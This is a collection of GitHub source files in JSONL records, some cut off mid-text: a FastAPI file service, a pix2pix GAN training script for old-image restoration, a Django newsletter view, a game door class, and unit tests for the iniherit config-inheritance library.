file: UploadFile,\n                                        path_project: str):\n        try:\n            req = models.Project_file(id_project=project_id, path_project=path_project, file_name=file.filename,\n                                      content_type=file.content_type)\n            db_session.add(req)\n            db_session.commit()\n            with open(f\"{path_project}/{file.filename}\", \"wb\") as buffer:\n                shutil.copyfileobj(file.file, buffer)\n        except Exception as ex:\n            ic(ex)\n            db_session.rollback()\n\n    def delete_file_by_project_id(self, db_session: Session, project_id: int, file_id: int):\n        # TODO: implement an archive, i.e. 
after a file is deleted, the file is moved to an archive that is purged every 30 days\n        try:\n            project_file = db_session.query(models.Project_file).filter(models.Project_file.id_project == project_id,\n                                                                         models.Project_file.id == file_id).first()\n            db_session.delete(project_file)\n            db_session.flush()\n            os.remove(project_file.path_file)\n        except Exception as ex:\n            ic(ex)\n            db_session.rollback()\n\n\ncrud_project = CRUDProject(models.Project)\n","repo_name":"Dolgopolovww/HTW_manager","sub_path":"src/project/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":8992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"20357787735","text":"import torch\r\nimport torch.nn as nn\r\nimport torchvision.transforms as transforms\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport torchvision.datasets as dset\r\nfrom .data import image_manipulation\r\nfrom .data import dataloader as img_dataloader\r\nfrom torch.autograd import Variable\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\n\r\n\r\ndef weights_init_normal(m):\r\n    classname = m.__class__.__name__\r\n    if classname.find(\"Conv\") != -1:\r\n        torch.nn.init.normal_(m.weight.data, 0.0, 0.02)\r\n    elif classname.find(\"BatchNorm2d\") != -1:\r\n        torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n        torch.nn.init.constant_(m.bias.data, 0.0)\r\n\r\nclass UNetDown(nn.Module):\r\n    def __init__(self, in_size, out_size, normalize = True, dropout = 0.0):\r\n        super(UNetDown, self).__init__()\r\n        layers = [\r\n            nn.Conv2d(in_size, out_size, 4, 2, 1, bias = False)\r\n        ]\r\n        if normalize:\r\n            layers.append(nn.InstanceNorm2d(out_size))\r\n        \r\n        layers.append(nn.LeakyReLU(0.2))\r\n        \r\n        if dropout:\r\n            layers.append(nn.Dropout(dropout))\r\n        \r\n        self.model = nn.Sequential(*layers)\r\n    \r\n    def forward(self, x):\r\n        return self.model(x)\r\n\r\nclass UNetUp(nn.Module):\r\n    def __init__(self, in_size, out_size, dropout = 0.0):\r\n        super(UNetUp, self).__init__()\r\n\r\n        layers = [\r\n            nn.ConvTranspose2d(in_size, out_size, 4, 2, 1, bias=False),\r\n            nn.InstanceNorm2d(out_size),\r\n            nn.ReLU(inplace=True),\r\n        ]\r\n        if dropout:\r\n            layers.append(nn.Dropout(dropout))\r\n\r\n        self.model = nn.Sequential(*layers)\r\n    \r\n    \r\n    def forward(self, x, skip_input):\r\n        x = self.model(x)\r\n        x = torch.cat((x, skip_input), 1)\r\n\r\n        return x\r\n\r\nclass GeneratorUNet(nn.Module):\r\n    def __init__(self, in_channels=3, out_channels=3):\r\n        super(GeneratorUNet, self).__init__()\r\n        \r\n        self.down1 = UNetDown(in_channels, 64, normalize=False)\r\n        self.down2 = UNetDown(64, 128)\r\n        self.down3 = UNetDown(128, 256)\r\n        self.down4 = UNetDown(256, 512, dropout=0.5)\r\n        self.down5 = UNetDown(512, 512, dropout=0.5)\r\n        self.down6 = UNetDown(512, 512, dropout=0.5)\r\n        self.down7 = UNetDown(512, 512, dropout=0.5)\r\n        self.down8 = UNetDown(512, 512, normalize=False, dropout=0.5)\r\n\r\n        self.up1 = UNetUp(512, 512, dropout=0.5)\r\n        self.up2 = UNetUp(1024, 512, dropout=0.5)\r\n        self.up3 = UNetUp(1024, 512, dropout=0.5)\r\n        self.up4 = UNetUp(1024, 512, dropout=0.5)\r\n        self.up5 = UNetUp(1024, 256)\r\n        self.up6 = UNetUp(512, 128)\r\n        self.up7 = UNetUp(256, 64)\r\n\r\n        self.final = nn.Sequential(\r\n            nn.Upsample(scale_factor=2),\r\n            nn.ZeroPad2d((1, 0, 1, 0)),\r\n            nn.Conv2d(128, out_channels, 4, padding=1),\r\n            nn.Tanh(),\r\n        )\r\n\r\n    def forward(self, x):\r\n        # U-Net generator with skip connections from encoder to decoder\r\n        d1 = self.down1(x)\r\n        d2 = self.down2(d1)\r\n        d3 = self.down3(d2)\r\n        d4 = 
self.down4(d3)\r\n        d5 = self.down5(d4)\r\n        d6 = self.down6(d5)\r\n        d7 = self.down7(d6)\r\n        d8 = self.down8(d7)\r\n        \r\n        # unet connections\r\n        u1 = self.up1(d8, d7)\r\n        u2 = self.up2(u1, d6)\r\n        u3 = self.up3(u2, d5)\r\n        u4 = self.up4(u3, d4)\r\n        u5 = self.up5(u4, d3)\r\n        u6 = self.up6(u5, d2)\r\n        u7 = self.up7(u6, d1)\r\n\r\n        return self.final(u7)\r\n\r\nclass Discriminator(nn.Module):\r\n    def __init__(self, in_channels=3):\r\n        super(Discriminator, self).__init__()\r\n\r\n        def discriminator_block(in_filters, out_filters, normalization=True):\r\n            \"\"\"Returns downsampling layers of each discriminator block\"\"\"\r\n            layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\r\n            if normalization:\r\n                layers.append(nn.InstanceNorm2d(out_filters))\r\n            layers.append(nn.LeakyReLU(0.2, inplace=True))\r\n            return layers\r\n\r\n        self.model = nn.Sequential(\r\n            *discriminator_block(in_channels * 2, 64, normalization=False),\r\n            *discriminator_block(64, 128),\r\n            *discriminator_block(128, 256),\r\n            *discriminator_block(256, 512),\r\n            nn.ZeroPad2d((1, 0, 1, 0)),\r\n            nn.Conv2d(512, 1, 4, padding=1, bias=False),\r\n            nn.Sigmoid()\r\n        )\r\n\r\n    def forward(self, img_A, img_B):\r\n        # Concatenate image and condition image by channels to produce input\r\n        img_input = torch.cat((img_A, img_B), 1)\r\n        return self.model(img_input)\r\n\r\n# ## Model Train\r\n\r\nif __name__ == \"__main__\":\r\n    torch.cuda.is_available()\r\n\r\n    # random seed for reproducibility\r\n    random_seed = 69\r\n\r\n    np.random.seed(random_seed)\r\n\r\n    # no of workers for dataloader\r\n    no_of_workers = 4\r\n\r\n    # root of the data\r\n    data_root = \"data/train/\"\r\n\r\n    # batch size\r\n    batch_size = 1\r\n\r\n    # no of epochs\r\n    n_epochs = 10\r\n\r\n    # learning rate\r\n    lr = 0.0002\r\n\r\n    # betas for adam\r\n    beta_1 = 0.5\r\n    beta_2 = 0.999\r\n\r\n    # image size\r\n    image_height = 256\r\n    image_width = 256\r\n\r\n    # We can use an image folder dataset the way we have it setup.\r\n    # Create the dataset\r\n    dataset = dset.ImageFolder(root=data_root,\r\n                               transform=transforms.Compose([\r\n                                   transforms.ToTensor(),\r\n                               ]))\r\n    # Create the dataloader\r\n    dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\r\n                                             num_workers = no_of_workers)\r\n    # initialize model classes\r\n    generator = GeneratorUNet()\r\n    discriminator = Discriminator()\r\n\r\n\r\n    # check if cuda is available\r\n    cuda = True if torch.cuda.is_available() else False\r\n    device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n    print(cuda)\r\n\r\n    # initialize weights if the model is not found in the paths\r\n    if os.path.exists(\"saved_models/generator_49.pth\"):\r\n        print(\"Generator Found\")\r\n        generator.load_state_dict(torch.load(\"saved_models/generator_49.pth\", map_location = device))\r\n    else:\r\n        generator.apply(weights_init_normal)\r\n    \r\n    if os.path.exists(\"saved_models/discriminator_49.pth\"):\r\n        print(\"Discriminator Found\")\r\n        discriminator.load_state_dict(torch.load(\"saved_models/discriminator_49.pth\", map_location = device))\r\n    else:\r\n        discriminator.apply(weights_init_normal)\r\n\r\n    # model loss functions\r\n    loss_fn_generator = torch.nn.MSELoss() # mean squared loss\r\n    loss_fn_disc = torch.nn.L1Loss() # pixel wise loss\r\n\r\n    # to cuda if cuda is available\r\n    generator.to(device)\r\n    discriminator.to(device)\r\n    loss_fn_disc.to(device)\r\n    loss_fn_generator.to(device)\r\n    \r\n    # optimizers\r\n    optimizer_G = torch.optim.Adam(generator.parameters(), betas=(beta_1, beta_2), lr=lr)\r\n    optimizer_D = 
torch.optim.Adam(discriminator.parameters(), betas=(beta_1, beta_2), lr=lr)\r\n\r\n    # Loss weight of L1 pixel-wise loss between translated image and real image\r\n    lambda_pixel = 100\r\n\r\n    # Calculate output of image discriminator (PatchGAN)\r\n    patch = (1, image_height // 2 ** 4, image_width // 2 ** 4)\r\n\r\n    # Tensor type\r\n    Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\r\n\r\n    transform = transforms.Compose([\r\n        transforms.ToTensor(), # transform to tensor\r\n        transforms.Resize((image_width, image_height)) # Resize the image to constant size\r\n    ])\r\n\r\n    # create a dataloader\r\n    pair_image_dataloader = img_dataloader.ImageDataset(\"./data/train_2/old_images\", \"./data/train_2/reconstructed_images\", transform)\r\n\r\n    for epoch in range(1):\r\n        for i, batch in tqdm(enumerate(pair_image_dataloader)):\r\n            real_A = batch['A'].unsqueeze(0) # old image\r\n            real_B = batch['B'].unsqueeze(0) # new image\r\n            \r\n            # train generator\r\n            optimizer_G.zero_grad()\r\n            \r\n            # Adversarial ground truths\r\n            valid = Variable(Tensor(np.ones((real_A.size(0), *patch))), requires_grad=False) # ground truth for valid\r\n            fake = Variable(Tensor(np.zeros((real_A.size(0), *patch))), requires_grad=False) # ground truth for invalid\r\n            \r\n            \r\n            # GAN loss\r\n            fake_B = generator(real_A.to(device)) # fake sample generated by generator\r\n            pred_fake = discriminator(fake_B.to(device), real_B.to(device)) # prediction using discriminator\r\n            loss_generator = loss_fn_generator(pred_fake.to(device), valid.to(device)) # check if the sample is valid or not\r\n            \r\n            loss_pixel = loss_fn_disc(fake_B.to(device), real_B.to(device)) # calculate the pixel wise loss\r\n            \r\n            # total loss\r\n            loss_G = loss_generator + lambda_pixel * loss_pixel # total loss of the generator\r\n            \r\n            loss_G.backward()\r\n            optimizer_G.step()\r\n            \r\n            ## Train discriminator\r\n            optimizer_D.zero_grad()\r\n            \r\n            # Real loss\r\n            pred_real = discriminator(real_B.to(device), real_A.to(device)) # loss to check real or not\r\n            loss_real = loss_fn_generator(pred_real, valid)\r\n\r\n            # Fake loss\r\n            pred_fake = discriminator(fake_B.detach().to(device), real_A.to(device)) # loss to check fake or not\r\n            loss_fake = loss_fn_generator(pred_fake.to(device), fake.to(device))\r\n\r\n            # Total loss\r\n            loss_D = 0.5 * (loss_real + loss_fake) # total loss of the discriminator\r\n            \r\n            loss_D.backward()\r\n            optimizer_D.step()\r\n            \r\n            # for logging\r\n            if i % 100 == 0 and i:\r\n                print(f\"Generator Error: {torch.linalg.norm(loss_G).item()}, epoch: {epoch}, itr: {i}\")\r\n                print(f\"Discriminator Error: {torch.linalg.norm(loss_D).item()}, epoch: {epoch}, itr: {i}\")\r\n            \r\n            # train on only the first 500 image pairs\r\n            if i % 500 == 0 and i > 0:\r\n                break\r\n\r\n\r\n    torch.save(generator.state_dict(), \"saved_models/generator.pth\")\r\n    torch.save(discriminator.state_dict(), \"saved_models/discriminator.pth\")\r\n","repo_name":"Imsanskar/Old-image-restoration-minor","sub_path":"webpage/pix2pix/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"}
{"seq_id":"23966446869","text":"from django.shortcuts import redirect, render\nfrom .forms import NewsletterSubscribeForm\nfrom .models import Newsletter\n\n\ndef newsletter_list(request):\n\n    user = None\n    \n    if request.method == 'POST':\n        form = NewsletterSubscribeForm(request.POST, user=user)\n        if form.is_valid():\n            form.subscribe(request)\n            return redirect('home')\n    else:\n        form = 
NewsletterSubscribeForm(user=user)\n\n return render(request, 'newsletters/newsletter_list.html', {\n 'newsletters': Newsletter.objects.all(),\n 'form': form\n })\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"166182289","text":"from modules.object import Object\n\nclass Door(Object):\n\tdef __init__(self, image, x, y, width, height, color, pk=None):\n\t\tsuper().__init__(image, x, y, width, height, color, pk)\n\t\tself.start_x = x\n\t\tself.start_y = y\n\t\tself.closed = False\n\t\tself.counter = self.hitbox.height\n\t\n\tdef open(self, level_arm):\n\t\tif self.closed == False:\n\t\t\tif level_arm.pk == self.pk and level_arm.is_on == True:\n\t\t\t\tlevel_arm.color = (0,255,0)\n\t\t\t\tif self.counter > 0:\n\t\t\t\t\tself.hitbox.y -= 1\n\t\t\t\t\tself.counter -= 1\n\t\t\t\telse:\n\t\t\t\t\tself.counter = self.hitbox.height\n\t\t\t\t\tself.closed = True\n\t\t\t\t\tlevel_arm.is_on = False\n\t\telse:\n\t\t\tif level_arm.pk == self.pk and level_arm.is_on == True:\n\t\t\t\tlevel_arm.color = (255,0,0)\n\t\t\t\tif self.counter > 0:\n\t\t\t\t\tself.hitbox.y += 1\n\t\t\t\t\tself.counter -= 1\n\t\t\t\telse:\n\t\t\t\t\tself.counter = self.hitbox.height\n\t\t\t\t\tself.closed = False\n\t\t\t\t\tlevel_arm.is_on = False\n","repo_name":"Tripchanski/Christmas_Adventure_2023","sub_path":"modules/door.py","file_name":"door.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"411335516","text":"import unittest\nimport io\nimport textwrap\n\nimport six\n\nfrom .parser import Loader, ConfigParser, SafeConfigParser\n\n#------------------------------------------------------------------------------\nclass ByteLoader(Loader):\n def __init__(self, *args, **kw):\n self.items = dict()\n self.items.update(*args, **kw)\n def load(self, name, encoding=None):\n if name not in self.items:\n raise IOError(2, 'No such file or directory', name)\n ret = six.StringIO(self.items[name])\n ret.name = name\n return ret\n\n#------------------------------------------------------------------------------\nclass TestIniherit(unittest.TestCase):\n\n maxDiff = None\n\n #----------------------------------------------------------------------------\n def test_iniherit(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\n [DEFAULT]\n kw1 = base-kw1\n kw2 = base-kw2\n [section]\n test1 = only in base, the value \"%(kw1)s\" should be \"base-kw1\"\n test2 = the value \"%(kw2)s\" should be \"base-kw2\"\n ''',\n 'extend.ini' : '''\n [DEFAULT]\n %inherit = base.ini\n kw1 = extend-kw1\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'extend-kw1')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'base-kw2')\n self.assertEqual(parser.get('section', 'test1'),\n 'only in base, the value \"extend-kw1\" should be \"base-kw1\"')\n self.assertEqual(parser.get('section', 'test2'),\n 'the value \"base-kw2\" should be \"base-kw2\"')\n self.assertFalse(parser.has_option('DEFAULT', '%inherit'))\n\n #----------------------------------------------------------------------------\n def test_iniherit_multiple(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\n [DEFAULT]\n kw1 = base-kw1\n kw2 = base-kw2\n kw3 = 
base-kw3\n kw4 = base-kw4\n ''',\n 'override.ini' : '''\n [DEFAULT]\n kw2 = override-kw2\n kw3 = override-kw3\n kw5 = override-kw5\n ''',\n 'extend.ini' : '''\n [DEFAULT]\n %inherit = base.ini ?no-such-ini.ini override.ini\n kw1 = extend-kw1\n kw3 = extend-kw3\n kw6 = extend-kw6\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'extend-kw1')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'override-kw2')\n self.assertEqual(parser.get('DEFAULT', 'kw3'), 'extend-kw3')\n self.assertEqual(parser.get('DEFAULT', 'kw4'), 'base-kw4')\n self.assertEqual(parser.get('DEFAULT', 'kw5'), 'override-kw5')\n self.assertEqual(parser.get('DEFAULT', 'kw6'), 'extend-kw6')\n\n #----------------------------------------------------------------------------\n def test_iniherit_noSuchFile(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw1 = base-kw1\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini no-such-ini.ini\\nkw2 = extend-kw2\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n self.assertRaises(IOError, parser.read, 'extend.ini')\n\n #----------------------------------------------------------------------------\n def test_iniherit_relativePath(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'dir/base.ini' : '[section]\\nkw1 = base-kw1\\n',\n 'dir/mid.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[section]\\nkw2 = mid-kw2\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = dir/mid.ini\\n[section]\\nkw3 = extend-kw3\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('section', 'kw1'), 'base-kw1')\n self.assertEqual(parser.get('section', 'kw2'), 'mid-kw2')\n self.assertEqual(parser.get('section', 'kw3'), 'extend-kw3')\n\n #----------------------------------------------------------------------------\n def test_iniherit_inheritTargetInterpolation(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base-without-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/foo.ini\n code = foo\n [section]\n %inherit = dir/bar.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'base-with-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/%(code)s.ini\n code = foo\n [section]\n %inherit = dir/%(ENV:THECODE:-noexist)s.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'base-with-cascading-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/%(code)s.ini\n code = foo\n [section]\n %inherit = dir/%(code)s.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'dir/foo.ini' : '''\n [DEFAULT]\n value = it-is-foo\n ''',\n 'dir/bar.ini' : '''\n [section]\n value = it-is-bar\n ''',\n }.items()}\n import os\n os.environ['THECODE'] = 'bar'\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('base-without-interpolation.ini')\n self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n self.assertEqual(parser.get('section', 'code'), 'bar')\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('base-with-interpolation.ini')\n self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n self.assertEqual(parser.get('section', 'code'), 'bar')\n # TODO: enable this when \"%inherit\" interpolation uses iniherit\n # interpolation for recursive 
interpolation...\n # parser = ConfigParser(loader=ByteLoader(files))\n # parser.read('base-with-cascading-interpolation.ini')\n # self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n # self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n # self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n # self.assertEqual(parser.get('section', 'code'), 'bar')\n\n #----------------------------------------------------------------------------\n def test_iniherit_nameWithSpace(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base + space.ini' : '[DEFAULT]\\nkw=word\\n',\n 'config.ini' : '[DEFAULT]\\n%inherit = base%20%2b%20space.ini\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw'), 'word')\n\n #----------------------------------------------------------------------------\n def test_iniherit_sectionInherit(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw1=word\\n[s]\\nfoo=bar\\nx=y\\n',\n 'other.ini' : '[DEFAULT]\\nkw2=word\\n[so]\\nzig=zag\\n',\n 'config.ini' : '[s]\\n%inherit = base.ini other.ini[so]\\nx=z\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n self.assertEqual(parser.items('DEFAULT'), [])\n self.assertEqual(sorted(parser.items('s')),\n sorted(dict(foo='bar', zig='zag', x='z').items()))\n\n #----------------------------------------------------------------------------\n def test_iniherit_interpolation(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '[app]\\noutput = %(tmpdir)s/var/result.log\\n',\n }.items()}\n parser = SafeConfigParser(\n defaults={'tmpdir': '/tmp'}, loader=ByteLoader(dict(files)))\n parser.read('config.ini')\n self.assertEqual(parser.get('app', 'output'), '/tmp/var/result.log')\n self.assertEqual(parser.get('app', 'output', raw=True), '%(tmpdir)s/var/result.log')\n\n #----------------------------------------------------------------------------\n def test_iniherit_invalidInterpolationValues(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '[logger]\\ntimefmt=%H:%M:%S\\n',\n }.items()}\n parser = SafeConfigParser(loader=ByteLoader(dict(files)))\n parser.read('config.ini')\n self.assertEqual(parser.items('DEFAULT'), [])\n self.assertEqual(parser.get('logger', 'timefmt', raw=True), '%H:%M:%S')\n\n #----------------------------------------------------------------------------\n def test_install_globally(self):\n from anki_killstreaks._vendor.iniherit.parser import CP\n from anki_killstreaks._vendor.iniherit.mixin import install_globally, uninstall_globally\n\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw = base-kw\\n',\n 'config.ini' : '[DEFAULT]\\n%inherit = base.ini\\n',\n }.items()}\n loader = ByteLoader(dict(files))\n\n def do_the_test():\n # first test that inheritance doesn't work\n parser = CP.ConfigParser()\n parser.loader = loader\n parser.readfp(loader.load('config.ini'))\n with self.assertRaises(CP.NoOptionError):\n parser.get('DEFAULT', 'kw')\n # then monkey-patch and test that inheritance does work\n install_globally()\n parser = CP.ConfigParser()\n parser.loader = loader\n parser.readfp(loader.load('config.ini'))\n self.assertEqual(parser.get('DEFAULT', 'kw'), 'base-kw')\n uninstall_globally()\n\n do_first_test = do_second_test = do_the_test\n do_first_test()\n do_second_test()\n\n #----------------------------------------------------------------------------\n def 
test_output_order_ascending(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[s1]\\ns1v = b1\\n[s2]\\ns2v = b2\\n[s3]\\ns3v = b3\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[s2]\\ns2v = o2',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n output = six.StringIO()\n parser.write(output)\n self.assertMultiLineEqual(\n output.getvalue(),\n '[s1]\\ns1v = b1\\n\\n[s2]\\ns2v = o2\\n\\n[s3]\\ns3v = b3\\n\\n')\n\n #----------------------------------------------------------------------------\n def test_output_order_descending(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[s3]\\ns3v = b3\\n[s2]\\ns2v = b2\\n[s1]\\ns1v = b1\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[s2]\\ns2v = o2',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n output = six.StringIO()\n parser.write(output)\n self.assertMultiLineEqual(\n output.getvalue(),\n '[s3]\\ns3v = b3\\n\\n[s2]\\ns2v = o2\\n\\n[s1]\\ns1v = b1\\n\\n')\n\n #----------------------------------------------------------------------------\n def test_interpolation_super_depth(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [DEFAULT]\n keys2 = base-vals\n # [loggers]\n # keys = root, authz\n # okeys = okeys-bVal\n ''',\n 'mid.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini ?no-such-ini.ini\n # key1 = val1\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = mid.ini\n # nkeys = %(SUPER:-nval0)s, eVal1\n keys2 = %(SUPER:-nval0)s, eVal1\n # [loggers]\n # keys = %(SUPER)s, authn\n # okeys = %(SUPER:-okeys-eDef)s, okeys-eVal\n # dkeys = %(SUPER:-dkeys-eDef)s, dkeys-eVal\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n\n # self.assertEqual(parser.get('loggers', 'keys'), 'root, authz, authn')\n # self.assertEqual(parser.get('loggers', 'okeys'), 'okeys-bVal, okeys-eVal')\n # self.assertEqual(parser.get('loggers', 'dkeys'), 'dkeys-eDef, dkeys-eVal')\n\n self.assertEqual(parser.get('DEFAULT', 'keys2'), 'base-vals, eVal1')\n\n # self.assertEqual(parser.get('DEFAULT', 'nkeys'), 'nval0, eVal1')\n # self.assertEqual(parser.get('DEFAULT', 'key1'), 'val1')\n\n #----------------------------------------------------------------------------\n def test_interpolation_super_breadth(self):\n from anki_killstreaks._vendor.iniherit import InterpolationMissingSuperError\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [loggers]\n keys = root, authz\n ''',\n 'adjust.ini' : '''\\\n [loggers]\n keys = %(SUPER)s, authn\n nkey = %(SUPER)s and boom!\n dkey = %(SUPER:-more)s or less\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini adjust.ini\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('loggers', 'keys'), 'root, authz, authn')\n self.assertEqual(parser.get('loggers', 'dkey'), 'more or less')\n with self.assertRaises(InterpolationMissingSuperError) as cm:\n parser.get('loggers', 'nkey')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [loggers]\n \\toption : nkey\n \\tkey : SUPER\n \\trawval : %(SUPER)s and boom!\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'nkey' in section 'loggers'\"\n \" contains an interpolation key 'SUPER' which is not a valid option name.\"\n \" Raw value: '%(SUPER)s and boom!'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n 
#----------------------------------------------------------------------------\n def test_interpolation_super_invalid(self):\n from anki_killstreaks._vendor.iniherit import InterpolationMissingSuperError\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\\\n [DEFAULT]\n key1 = val1\n ''',\n 'extend.ini' : '''\\\n [DEFAULT]\n %inherit = base.ini\n key2 = %(SUPER)s and boom!\n ''',\n }.items()}\n files = {k: textwrap.dedent(v) for k, v in files.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n with self.assertRaises(InterpolationMissingSuperError) as cm:\n parser.get('DEFAULT', 'key2')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [DEFAULT]\n \\toption : key2\n \\tkey : SUPER\n \\trawval : %(SUPER)s and boom!\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'key2' in section 'DEFAULT'\"\n \" contains an interpolation key 'SUPER' which is not a valid option name.\"\n \" Raw value: '%(SUPER)s and boom!'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n #----------------------------------------------------------------------------\n def test_interpolation_env(self):\n import os\n from six.moves.configparser import InterpolationDepthError\n from anki_killstreaks._vendor.iniherit import InterpolationMissingEnvError\n files = {k: textwrap.dedent(v) for k, v in {\n 'config.ini' : '''\\\n [section]\n key1 = %(ENV:INIHERIT_TEST_EXIST)s\n key2 = %(ENV:INIHERIT_TEST_EXIST:-default-value)s\n key3 = %(ENV:INIHERIT_TEST_NOEXIST)s\n key4 = %(ENV:INIHERIT_TEST_NOEXIST:-default-value)s\n key5 = %(ENV:INIHERIT_TEST_INFLOOP)s\n ''',\n }.items()}\n files = {k: textwrap.dedent(v) for k, v in files.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('config.ini')\n # note: setting envvar's *after* reading to ensure that interpolation\n # occurs on-demand, i.e. 
lazy-eval\n os.environ.pop('INIHERIT_TEST_NOEXIST', None)\n os.environ['INIHERIT_TEST_EXIST'] = 'this-value'\n os.environ['INIHERIT_TEST_INFLOOP'] = '%(ENV:INIHERIT_TEST_INFLOOP)s'\n self.assertEqual(parser.get('section', 'key1'), 'this-value')\n self.assertEqual(parser.get('section', 'key2'), 'this-value')\n self.assertEqual(parser.get('section', 'key4'), 'default-value')\n with self.assertRaises(InterpolationMissingEnvError) as cm:\n parser.get('section', 'key3')\n if six.PY2:\n err = textwrap.dedent('''\\\n Bad value substitution:\n \\tsection: [section]\n \\toption : key3\n \\tkey : INIHERIT_TEST_NOEXIST\n \\trawval : %(ENV:INIHERIT_TEST_NOEXIST)s\n ''')\n else:\n err = (\n \"Bad value substitution:\"\n \" option 'key3' in section 'section'\"\n \" contains an interpolation key 'INIHERIT_TEST_NOEXIST'\"\n \" which is not a valid option name.\"\n \" Raw value: '%(ENV:INIHERIT_TEST_NOEXIST)s'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n with self.assertRaises(InterpolationDepthError) as cm:\n parser.get('section', 'key5')\n if six.PY2:\n err = textwrap.dedent('''\\\n Value interpolation too deeply recursive:\n \\tsection: [section]\n \\toption : key5\n \\trawval : %(ENV:INIHERIT_TEST_INFLOOP)s\n ''')\n else:\n err = (\n \"Recursion limit exceeded in value substitution:\"\n \" option 'key5' in section 'section'\"\n \" contains an interpolation key which cannot be substituted in 10 steps.\"\n \" Raw value: '%(ENV:INIHERIT_TEST_INFLOOP)s'\"\n )\n self.assertMultiLineEqual(str(cm.exception), err)\n\n #----------------------------------------------------------------------------\n def test_cascading_env_interpolate(self):\n # test that if a key contains an interpolation of another key\n # can in 